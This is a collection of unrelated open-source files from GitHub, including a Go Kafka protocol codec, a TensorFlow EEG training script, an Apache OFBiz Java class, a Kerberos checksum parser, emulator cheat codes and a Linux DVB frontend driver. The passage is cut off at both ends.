rgCaseLabel.Caption := lisCaseBlocksCaseWithoutBegin;
rgCaseLabel.Items[0] := lisCaseBlocksAlways;
rgCaseLabel.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseLabel.Items[2] := lisCaseBlocksNever;
rgCaseElseBegin.Caption := lisCaseBlocksElseCaseWithBegin;
rgCaseElseBegin.Items[0] := lisCaseBlocksAlways;
rgCaseElseBegin.Items[1] := lisCaseBlocksLeaveAsIs;
rgCaseElseBegin.Items[2] := lisCaseBlocksNever;
rgElseCase.Caption := lisCaseBlocksElseCaseWithoutBegin;
rgElseCase.Items[0] := lisCaseBlocksAlways;
rgElseCase.Items[1] := lisCaseBlocksLeaveAsIs;
rgElseCase.Items[2] := lisCaseBlocksNever;
end;
{-------------------------------------------------------------------------------
worker procs }
procedure TfClarifyCaseBlocks.ReadSettings(AOptions: TAbstractIDEOptions);
begin
with FormattingSettings.Returns do
begin
{ block styles }
rgLabelBegin.ItemIndex := Ord(LabelBeginStyle);
rgLabel.ItemIndex := Ord(LabelStyle);
rgCaseLabel.ItemIndex := Ord(CaseLabelStyle);
rgCaseBegin.ItemIndex := Ord(CaseBeginStyle);
rgElseCase.ItemIndex := Ord(CaseElseStyle);
rgCaseElseBegin.ItemIndex := Ord(CaseElseBeginStyle);
end;
end;
procedure TfClarifyCaseBlocks.WriteSettings(AOptions: TAbstractIDEOptions);
begin
with FormattingSettings.Returns do
begin
{ block styles }
LabelBeginStyle := TTriOptionStyle(rgLabelBegin.ItemIndex);
LabelStyle := TTriOptionStyle(rgLabel.ItemIndex);
CaseLabelStyle := TTriOptionStyle(rgCaseLabel.ItemIndex);
CaseBeginStyle := TTriOptionStyle(rgCaseBegin.ItemIndex);
CaseElseStyle := TTriOptionStyle(rgElseCase.ItemIndex);
CaseElseBeginStyle := TTriOptionStyle(rgCaseElseBegin.ItemIndex);
end;
end;
class function TfClarifyCaseBlocks.SupportedOptionsClass: TAbstractIDEOptionsClass;
begin
Result := TFormattingSettings;
end;
{-------------------------------------------------------------------------------
event handlers }
initialization
RegisterIDEOptionsEditor(JCFOptionsGroup, TfClarifyCaseBlocks, JCFOptionCaseBlocks, JCFOptionLongLines);
end.
| {
"pile_set_name": "Github"
} |
package sarama
type OffsetResponseBlock struct {
Err KError
Offsets []int64 // Version 0
Offset int64 // Version 1
Timestamp int64 // Version 1
}
func (b *OffsetResponseBlock) decode(pd packetDecoder, version int16) (err error) {
tmp, err := pd.getInt16()
if err != nil {
return err
}
b.Err = KError(tmp)
if version == 0 {
b.Offsets, err = pd.getInt64Array()
return err
}
b.Timestamp, err = pd.getInt64()
if err != nil {
return err
}
b.Offset, err = pd.getInt64()
if err != nil {
return err
}
// For backwards compatibility put the offset in the offsets array too
b.Offsets = []int64{b.Offset}
return nil
}
func (b *OffsetResponseBlock) encode(pe packetEncoder, version int16) (err error) {
pe.putInt16(int16(b.Err))
if version == 0 {
return pe.putInt64Array(b.Offsets)
}
pe.putInt64(b.Timestamp)
pe.putInt64(b.Offset)
return nil
}
type OffsetResponse struct {
Version int16
Blocks map[string]map[int32]*OffsetResponseBlock
}
func (r *OffsetResponse) decode(pd packetDecoder, version int16) (err error) {
numTopics, err := pd.getArrayLength()
if err != nil {
return err
}
r.Blocks = make(map[string]map[int32]*OffsetResponseBlock, numTopics)
for i := 0; i < numTopics; i++ {
name, err := pd.getString()
if err != nil {
return err
}
numBlocks, err := pd.getArrayLength()
if err != nil {
return err
}
r.Blocks[name] = make(map[int32]*OffsetResponseBlock, numBlocks)
for j := 0; j < numBlocks; j++ {
id, err := pd.getInt32()
if err != nil {
return err
}
block := new(OffsetResponseBlock)
err = block.decode(pd, version)
if err != nil {
return err
}
r.Blocks[name][id] = block
}
}
return nil
}
func (r *OffsetResponse) GetBlock(topic string, partition int32) *OffsetResponseBlock {
if r.Blocks == nil {
return nil
}
if r.Blocks[topic] == nil {
return nil
}
return r.Blocks[topic][partition]
}
/*
// [0 0 0 1 ntopics
0 8 109 121 95 116 111 112 105 99 topic
0 0 0 1 npartitions
0 0 0 0 id
0 0
0 0 0 1 0 0 0 0
0 1 1 1 0 0 0 1
0 8 109 121 95 116 111 112
105 99 0 0 0 1 0 0
0 0 0 0 0 0 0 1
0 0 0 0 0 1 1 1] <nil>
*/
func (r *OffsetResponse) encode(pe packetEncoder) (err error) {
if err = pe.putArrayLength(len(r.Blocks)); err != nil {
return err
}
for topic, partitions := range r.Blocks {
if err = pe.putString(topic); err != nil {
return err
}
if err = pe.putArrayLength(len(partitions)); err != nil {
return err
}
for partition, block := range partitions {
pe.putInt32(partition)
if err = block.encode(pe, r.version()); err != nil {
return err
}
}
}
return nil
}
func (r *OffsetResponse) key() int16 {
return 2
}
func (r *OffsetResponse) version() int16 {
return r.Version
}
func (r *OffsetResponse) headerVersion() int16 {
return 0
}
func (r *OffsetResponse) requiredVersion() KafkaVersion {
switch r.Version {
case 1:
return V0_10_1_0
default:
return MinVersion
}
}
// testing API
func (r *OffsetResponse) AddTopicPartition(topic string, partition int32, offset int64) {
if r.Blocks == nil {
r.Blocks = make(map[string]map[int32]*OffsetResponseBlock)
}
byTopic, ok := r.Blocks[topic]
if !ok {
byTopic = make(map[int32]*OffsetResponseBlock)
r.Blocks[topic] = byTopic
}
byTopic[partition] = &OffsetResponseBlock{Offsets: []int64{offset}, Offset: offset}
}
| {
"pile_set_name": "Github"
} |
import tensorflow as tf
import numpy as np
import utils as ut
import network as nt
import setting as st
from sklearn.metrics import accuracy_score, cohen_kappa_score
## Placeholding
X = tf.placeholder(dtype=tf.float32, shape=[st.batch_size, 22, 512, 1])
Y = tf.placeholder(dtype=tf.float32, shape=[st.batch_size])
X_valid = tf.placeholder(dtype=tf.float32, shape=[239, 22, 512, 1])
Y_valid = tf.placeholder(dtype=tf.float32, shape=[239])
## Load dataset
sbj = st.subject
data, label, data_valid, label_valid = ut.load_data(sbj=sbj, training=True) #(22, 750, 288), (288,)
data_test, label_test = ut.load_data(sbj=sbj, training=False) #(22, 750, 288), (288,)
## Baseline
logits, _, _, _ = nt.DeepConvNet(input=X, adversarial=False)
loss = ut.calculate_loss_baseline(logits=logits, labels=Y)
vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="DeepConvNet")
_, output, feature_tsne, sptial_weight = nt.DeepConvNet(input=X_valid, adversarial=False, reuse=True)
learning_rate = st.learning_rate
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss, var_list=vars)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(keep_checkpoint_every_n_hours=24, max_to_keep=1000)
rest_point = data.shape[1] - st.window_size + 1
total_batch = int((data.shape[-1] * rest_point)/st.batch_size)
loss_ = 0
print("Baseline Results")
print("Subject %d" % sbj)
for epoch in range(st.total_epoch):
# Randomize the dataset
rand_idx = np.random.permutation(rest_point * data.shape[-1]) # 68832
# Feed dictionary
for batch in range(total_batch):
batch_x = np.empty(shape=(st.batch_size, 22, st.window_size, 1))
batch_y = np.empty(shape=(st.batch_size))
for i in range(st.batch_size):
position = np.unravel_index(indices=rand_idx[epoch * st.batch_size + i], dims=(rest_point, data.shape[-1]))
batch_x[i, :, :, 0] = data[:, position[0]:position[0] + st.window_size, position[1]]
batch_y[i] = label[position[1]]
_, loss_ = sess.run([optimizer, loss], feed_dict={X:batch_x, Y:batch_y})
print("%04dth Epoch, Training Loss: %04f" % (epoch + 1, loss_))
# Validation
prediction = np.zeros(shape=(288))
grount_truth = np.zeros(shape=(288))
for trials in range(0, 288):
batch_x = np.empty(shape=(rest_point, 22, st.window_size, 1))
for batch in range(rest_point):
batch_x[batch, :, :, 0] = data_test[:, batch:batch+st.window_size, trials]
pred, feature = sess.run([output, feature_tsne], feed_dict={X_valid:batch_x})
grount_truth[trials] = label_test[trials]
prediction[trials] = np.argmax(np.bincount(np.squeeze(np.asarray(pred))))
np.save(st.tsne_path + "/common%04d_gt%d.npy" % (epoch, grount_truth[trials]), feature)
print("Validation accuracy: %f Kappa value: %f"
% (accuracy_score(y_true=grount_truth, y_pred=prediction), cohen_kappa_score(y1=grount_truth, y2=prediction)))
saver.save(sess, st.path + "/model%sbj%epoch.ckpt" %(sbj, epoch)) | {
"pile_set_name": "Github"
} |
// bslma_usesbslmaallocator.cpp -*-C++-*-
#include <bslma_usesbslmaallocator.h>
#include <bsls_ident.h>
BSLS_IDENT("$Id$ $CSID$")
#include <bslmf_assert.h> // for testing only
#include <bslmf_nestedtraitdeclaration.h> // for testing only
namespace BloombergLP {
} // close enterprise namespace
// ----------------------------------------------------------------------------
// Copyright 2013 Bloomberg Finance L.P.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ----------------------------- END-OF-FILE ----------------------------------
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*******************************************************************************/
package org.apache.ofbiz.minilang.method.entityops;
import org.apache.ofbiz.base.util.Debug;
import org.apache.ofbiz.base.util.collections.FlexibleMapAccessor;
import org.apache.ofbiz.entity.GenericEntityException;
import org.apache.ofbiz.entity.GenericValue;
import org.apache.ofbiz.minilang.MiniLangException;
import org.apache.ofbiz.minilang.MiniLangValidate;
import org.apache.ofbiz.minilang.SimpleMethod;
import org.apache.ofbiz.minilang.method.MethodContext;
import org.apache.ofbiz.minilang.method.MethodOperation;
import org.w3c.dom.Element;
/**
* Implements the <create-value> element.
* @see <a href="https://cwiki.apache.org/confluence/display/OFBIZ/Mini+Language+-+minilang+-+simple-method+-+Reference">Mini-language Reference</a>
*/
public final class CreateValue extends MethodOperation {
private static final String MODULE = CreateValue.class.getName();
private final boolean createOrStore;
@Deprecated
private final boolean doCacheClear;
private final FlexibleMapAccessor<GenericValue> valueFma;
public CreateValue(Element element, SimpleMethod simpleMethod) throws MiniLangException {
super(element, simpleMethod);
if (MiniLangValidate.validationOn()) {
MiniLangValidate.attributeNames(simpleMethod, element, "value-field", "do-cache-clear", "or-store");
MiniLangValidate.requiredAttributes(simpleMethod, element, "value-field");
MiniLangValidate.expressionAttributes(simpleMethod, element, "value-field");
MiniLangValidate.constantAttributes(simpleMethod, element, "do-cache-clear", "or-store");
MiniLangValidate.noChildElements(simpleMethod, element);
}
valueFma = FlexibleMapAccessor.getInstance(element.getAttribute("value-field"));
doCacheClear = !"false".equals(element.getAttribute("do-cache-clear"));
createOrStore = "true".equals(element.getAttribute("or-store"));
}
@Override
public boolean exec(MethodContext methodContext) throws MiniLangException {
SimpleMethod simpleMethod = getSimpleMethod();
GenericValue value = valueFma.get(methodContext.getEnvMap());
if (value == null) {
String errMsg = "In <create-value> the value \"" + valueFma + "\" was not found, not creating";
Debug.logWarning(errMsg, MODULE);
getSimpleMethod().addErrorMessage(methodContext, errMsg);
return false;
}
try {
if (createOrStore) {
value.getDelegator().createOrStore(value);
} else {
value.getDelegator().create(value);
}
} catch (GenericEntityException e) {
String errMsg = "Exception thrown while creating the \"" + valueFma + "\" GenericValue: " + e.getMessage();
Debug.logWarning(e, errMsg, MODULE);
getSimpleMethod().addErrorMessage(methodContext, errMsg);
return false;
}
return true;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder("<create-value ");
sb.append("value-field=\"").append(this.valueFma).append("\" ");
if (!this.doCacheClear) {
sb.append("do-cache-clear=\"false\"");
}
if (this.createOrStore) {
sb.append("or-store=\"true\"");
}
sb.append("/>");
return sb.toString();
}
/**
* A factory for the <create-value> element.
*/
public static final class CreateValueFactory implements Factory<CreateValue> {
@Override
public CreateValue createMethodOperation(Element element, SimpleMethod simpleMethod) throws MiniLangException {
return new CreateValue(element, simpleMethod);
}
@Override
public String getName() {
return "create-value";
}
}
}
| {
"pile_set_name": "Github"
} |
#ifndef IDC_STATIC
#define IDC_STATIC (-1)
#endif
#define IDD_DIALOG1 101
#define IDD_DIALOG2 102
#define IDC_LIST1 1000
#define IDC_ACTIVE 1004
#define IDI_ICON1 1005
#define IDC_INFO 40001
#define IDC_USERTEXT 40002
#define IDC_VERS 40003
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2007 Davis E. King ([email protected])
// License: Boost Software License See LICENSE.txt for the full license.
#ifndef DLIB_TIMEOUt_
#define DLIB_TIMEOUt_
#include "timeout/timeout.h"
#endif // DLIB_TIMEOUt_
| {
"pile_set_name": "Github"
} |
import Link from 'next/link'
import styles from './header.module.css'
import LogoIcon from '@/components/icons/logo'
import useTheme from '@/lib/theme'
import Moon from '@/components/icons/moon'
import Sun from '@/components/icons/sun'
import useMounted from '@/lib/use-mounted'
const Header = ({ slug, title }) => {
const isMounted = useMounted()
const { theme, toggleTheme } = useTheme()
return (
<nav className={styles.nav}>
<div className={styles.header}>
<span>
<Link href="/">
<a
aria-label="Navigate Home"
className={slug ? styles.home : styles.slug}
>
whatthefuck.is
</a>
</Link>
<span className={styles.tagline}>
· {' '}
{slug ? (
<b>
<span style={{ color: 'var(--accent)' }}>{title}</span>
</b>
) : (
<>Dan’s JavaScript Glossary</>
)}
</span>
</span>
<button
className={styles.command}
onClick={toggleTheme}
aria-label="Toggle Theme"
>
{isMounted &&
(theme === 'light' ? (
<Moon color="var(--fg)" size={30} key="icon-light" />
) : (
<Sun color="var(--fg)" size={30} key="icon-dark" />
))}
</button>
</div>
</nav>
)
}
export default Header
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<PreferenceScreen xmlns:android="http://schemas.android.com/apk/res/android">
<Preference
android:defaultValue=""
android:key="PERF_FORUMS2"
android:title="@string/pref_title_forum"/>
<MultiSelectListPreference
android:defaultValue="@array/default_freq_menu_values"
android:entries="@array/pref_title_freq_menu_names"
android:entryValues="@array/pref_title_freq_menu_values"
android:key="PERF_FREQ_MENUS"
android:title="@string/pref_title_freq_menus"/>
<PreferenceCategory android:title="@string/pref_category_tail">
<SwitchPreference
android:defaultValue="false"
android:key="PERF_SHOW_TAIL"
android:title="@string/pref_title_show_tail"/>
<SwitchPreference
android:defaultValue="false"
android:key="PERF_ADDTAIL"
android:title="@string/pref_title_add_tail"/>
<EditTextPreference
android:defaultValue="@string/default_tail_text"
android:inputType="text"
android:key="PERF_TAILTEXT"
android:maxLines="1"
android:selectAllOnFocus="true"
android:singleLine="true"
android:title="@string/pref_title_tail_text"/>
<EditTextPreference
android:defaultValue="@string/default_tail_url"
android:inputType="text"
android:key="PERF_TAILURL"
android:maxLines="1"
android:selectAllOnFocus="true"
android:singleLine="true"
android:title="@string/pref_title_tail_url"/>
</PreferenceCategory>
<PreferenceCategory android:title="@string/pref_category_blacklist">
<Preference
android:key="PERF_BLACKLIST"
android:title="@string/pref_title_blacklist"
android:summary="@string/pref_summary_blacklist"
android:widgetLayout="@layout/layout_preference"/>
</PreferenceCategory>
</PreferenceScreen> | {
"pile_set_name": "Github"
} |
/**
* This file is part of LIO-mapping.
*
* Copyright (C) 2019 Haoyang Ye <hy.ye at connect dot ust dot hk>,
* Robotics and Multiperception Lab (RAM-LAB <https://ram-lab.com>),
* The Hong Kong University of Science and Technology
*
* For more information please see <https://ram-lab.com/file/hyye/lio-mapping>
* or <https://sites.google.com/view/lio-mapping>.
* If you use this code, please cite the respective publications as
* listed on the above websites.
*
* LIO-mapping is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LIO-mapping is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LIO-mapping. If not, see <http://www.gnu.org/licenses/>.
*/
//
// Created by hyye on 4/11/18.
//
#include "factor/GravityLocalParameterization.h"
namespace lio {
bool GravityLocalParameterization::Plus(const double *x, const double *delta, double *x_plus_delta) const
{
Eigen::Map<const Eigen::Quaterniond> q(x);
Eigen::Map<const Eigen::Vector2d> dq_xy(delta);
Eigen::Quaterniond dq = DeltaQ(Eigen::Vector3d(dq_xy.x(), dq_xy.y(), 0.0));
Eigen::Map<Eigen::Quaterniond> q_plus(x_plus_delta);
q_plus = (q * dq).normalized();
return true;
}
bool GravityLocalParameterization::ComputeJacobian(const double *x, double *jacobian) const
{
Eigen::Map<Eigen::Matrix<double, 4, 2, Eigen::RowMajor>> j(jacobian);
j.topRows<2>().setIdentity();
j.bottomRows<2>().setZero();
return true;
}
} | {
"pile_set_name": "Github"
} |
// Copyright 2008, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// Author: [email protected] (Markus Heule)
//
// This test verifies that it's possible to use Google Test by including
// the gtest.h header file alone.
#include "gtest/gtest.h"
namespace {
void Subroutine() {
EXPECT_EQ(42, 42);
}
TEST(NoFatalFailureTest, ExpectNoFatalFailure) {
EXPECT_NO_FATAL_FAILURE(;);
EXPECT_NO_FATAL_FAILURE(SUCCEED());
EXPECT_NO_FATAL_FAILURE(Subroutine());
EXPECT_NO_FATAL_FAILURE({ SUCCEED(); });
}
TEST(NoFatalFailureTest, AssertNoFatalFailure) {
ASSERT_NO_FATAL_FAILURE(;);
ASSERT_NO_FATAL_FAILURE(SUCCEED());
ASSERT_NO_FATAL_FAILURE(Subroutine());
ASSERT_NO_FATAL_FAILURE({ SUCCEED(); });
}
} // namespace
| {
"pile_set_name": "Github"
} |
cheats = 13
cheat0_desc = "RCJC Pad 1"
cheat0_code = "700946E2+????"
cheat0_enable = false
cheat1_desc = "RCJC Pad 2"
cheat1_code = "7009470A+????"
cheat1_enable = false
cheat2_desc = "AnAc Pad 1"
cheat2_code = "700946E0+????"
cheat2_enable = false
cheat3_desc = "AnAc Pad 2"
cheat3_code = "70094708+????"
cheat3_enable = false
cheat4_desc = "Auto Activation Code"
cheat4_code = "F006CCDC+8009"
cheat4_enable = false
cheat5_desc = "PAL2NTSC"
cheat5_code = "34229D0F+091B"
cheat5_enable = false
cheat6_desc = "Y-Fix"
cheat6_code = "84230008+6C24"
cheat6_enable = false
cheat7_desc = "Red blood with german menus"
cheat7_code = "8420382E+E8B2"
cheat7_enable = false
cheat8_desc = "Developer cheat menu open"
cheat8_code = "742CC6EC+B67E+342CC6EC+B67D"
cheat8_enable = false
cheat9_desc = "Finish level (Press L2 & R2 & Circle)"
cheat9_code = "742CBD39+078A+842EB969+5125"
cheat9_enable = false
cheat10_desc = "Max. score (Press L1 & L2 & R1 & R2 at result screen)"
cheat10_code = "742CBD39+2B8A+B427FAD2+1238+142CC424+4BA6"
cheat10_enable = false
cheat11_desc = "Sudden death"
cheat11_code = "84240F89+C094"
cheat11_enable = false
cheat12_desc = "Hit anywhere"
cheat12_code = "04243E58+568A"
cheat12_enable = false
| {
"pile_set_name": "Github"
} |
/* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
#include "k5-int.h"
#include "cksumtypes.h"
krb5_error_code KRB5_CALLCONV
krb5_string_to_cksumtype(char *string, krb5_cksumtype *cksumtypep)
{
unsigned int i, j;
const char *alias;
const struct krb5_cksumtypes *ctp;
for (i=0; i<krb5int_cksumtypes_length; i++) {
ctp = &krb5int_cksumtypes_list[i];
if (strcasecmp(ctp->name, string) == 0) {
*cksumtypep = ctp->ctype;
return 0;
}
#define MAX_ALIASES (sizeof(ctp->aliases) / sizeof(ctp->aliases[0]))
for (j = 0; j < MAX_ALIASES; j++) {
alias = ctp->aliases[j];
if (alias == NULL)
break;
if (strcasecmp(alias, string) == 0) {
*cksumtypep = ctp->ctype;
return 0;
}
}
}
return EINVAL;
}
| {
"pile_set_name": "Github"
} |
/*
* TTUSB DEC Frontend Driver
*
* Copyright (C) 2003-2004 Alex Woods <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*/
#include "dvb_frontend.h"
#include "ttusbdecfe.h"
#define LOF_HI 10600000
#define LOF_LO 9750000
struct ttusbdecfe_state {
/* configuration settings */
const struct ttusbdecfe_config* config;
struct dvb_frontend frontend;
u8 hi_band;
u8 voltage;
};
static int ttusbdecfe_dvbs_read_status(struct dvb_frontend *fe,
fe_status_t *status)
{
*status = FE_HAS_SIGNAL | FE_HAS_VITERBI |
FE_HAS_SYNC | FE_HAS_CARRIER | FE_HAS_LOCK;
return 0;
}
static int ttusbdecfe_dvbt_read_status(struct dvb_frontend *fe,
fe_status_t *status)
{
struct ttusbdecfe_state* state = fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
u8 result[4];
int len, ret;
*status=0;
ret=state->config->send_command(fe, 0x73, sizeof(b), b, &len, result);
if(ret)
return ret;
if(len != 4) {
printk(KERN_ERR "%s: unexpected reply\n", __func__);
return -EIO;
}
switch(result[3]) {
case 1: /* not tuned yet */
case 2: /* no signal/no lock*/
break;
case 3: /* signal found and locked*/
*status = FE_HAS_SIGNAL | FE_HAS_VITERBI |
FE_HAS_SYNC | FE_HAS_CARRIER | FE_HAS_LOCK;
break;
case 4:
*status = FE_TIMEDOUT;
break;
default:
pr_info("%s: returned unknown value: %d\n",
__func__, result[3]);
return -EIO;
}
return 0;
}
static int ttusbdecfe_dvbt_set_frontend(struct dvb_frontend *fe)
{
struct dtv_frontend_properties *p = &fe->dtv_property_cache;
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x03,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0xff,
0x00, 0x00, 0x00, 0xff };
__be32 freq = htonl(p->frequency / 1000);
memcpy(&b[4], &freq, sizeof (u32));
state->config->send_command(fe, 0x71, sizeof(b), b, NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbt_get_tune_settings(struct dvb_frontend* fe,
struct dvb_frontend_tune_settings* fesettings)
{
fesettings->min_delay_ms = 1500;
/* Drift compensation makes no sense for DVB-T */
fesettings->step_size = 0;
fesettings->max_drift = 0;
return 0;
}
static int ttusbdecfe_dvbs_set_frontend(struct dvb_frontend *fe)
{
struct dtv_frontend_properties *p = &fe->dtv_property_cache;
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
__be32 freq;
__be32 sym_rate;
__be32 band;
__be32 lnb_voltage;
freq = htonl(p->frequency +
(state->hi_band ? LOF_HI : LOF_LO));
memcpy(&b[4], &freq, sizeof(u32));
sym_rate = htonl(p->symbol_rate);
memcpy(&b[12], &sym_rate, sizeof(u32));
band = htonl(state->hi_band ? LOF_HI : LOF_LO);
memcpy(&b[24], &band, sizeof(u32));
lnb_voltage = htonl(state->voltage);
memcpy(&b[28], &lnb_voltage, sizeof(u32));
state->config->send_command(fe, 0x71, sizeof(b), b, NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbs_diseqc_send_master_cmd(struct dvb_frontend* fe, struct dvb_diseqc_master_cmd *cmd)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
u8 b[] = { 0x00, 0xff, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00 };
memcpy(&b[4], cmd->msg, cmd->msg_len);
state->config->send_command(fe, 0x72,
sizeof(b) - (6 - cmd->msg_len), b,
NULL, NULL);
return 0;
}
static int ttusbdecfe_dvbs_set_tone(struct dvb_frontend* fe, fe_sec_tone_mode_t tone)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
state->hi_band = (SEC_TONE_ON == tone);
return 0;
}
static int ttusbdecfe_dvbs_set_voltage(struct dvb_frontend* fe, fe_sec_voltage_t voltage)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
switch (voltage) {
case SEC_VOLTAGE_13:
state->voltage = 13;
break;
case SEC_VOLTAGE_18:
state->voltage = 18;
break;
default:
return -EINVAL;
}
return 0;
}
static void ttusbdecfe_release(struct dvb_frontend* fe)
{
struct ttusbdecfe_state* state = (struct ttusbdecfe_state*) fe->demodulator_priv;
kfree(state);
}
static struct dvb_frontend_ops ttusbdecfe_dvbt_ops;
struct dvb_frontend* ttusbdecfe_dvbt_attach(const struct ttusbdecfe_config* config)
{
struct ttusbdecfe_state* state = NULL;
/* allocate memory for the internal state */
state = kmalloc(sizeof(struct ttusbdecfe_state), GFP_KERNEL);
if (state == NULL)
return NULL;
/* setup the state */
state->config = config;
/* create dvb_frontend */
memcpy(&state->frontend.ops, &ttusbdecfe_dvbt_ops, sizeof(struct dvb_frontend_ops));
state->frontend.demodulator_priv = state;
return &state->frontend;
}
static struct dvb_frontend_ops ttusbdecfe_dvbs_ops;
struct dvb_frontend* ttusbdecfe_dvbs_attach(const struct ttusbdecfe_config* config)
{
struct ttusbdecfe_state* state = NULL;
/* allocate memory for the internal state */
state = kmalloc(sizeof(struct ttusbdecfe_state), GFP_KERNEL);
if (state == NULL)
return NULL;
/* setup the state */
state->config = config;
state->voltage = 0;
state->hi_band = 0;
/* create dvb_frontend */
memcpy(&state->frontend.ops, &ttusbdecfe_dvbs_ops, sizeof(struct dvb_frontend_ops));
state->frontend.demodulator_priv = state;
return &state->frontend;
}
static struct dvb_frontend_ops ttusbdecfe_dvbt_ops = {
.delsys = { SYS_DVBT },
.info = {
.name = "TechnoTrend/Hauppauge DEC2000-t Frontend",
.frequency_min = 51000000,
.frequency_max = 858000000,
.frequency_stepsize = 62500,
.caps = FE_CAN_FEC_1_2 | FE_CAN_FEC_2_3 | FE_CAN_FEC_3_4 |
FE_CAN_FEC_5_6 | FE_CAN_FEC_7_8 | FE_CAN_FEC_AUTO |
FE_CAN_QAM_16 | FE_CAN_QAM_64 | FE_CAN_QAM_AUTO |
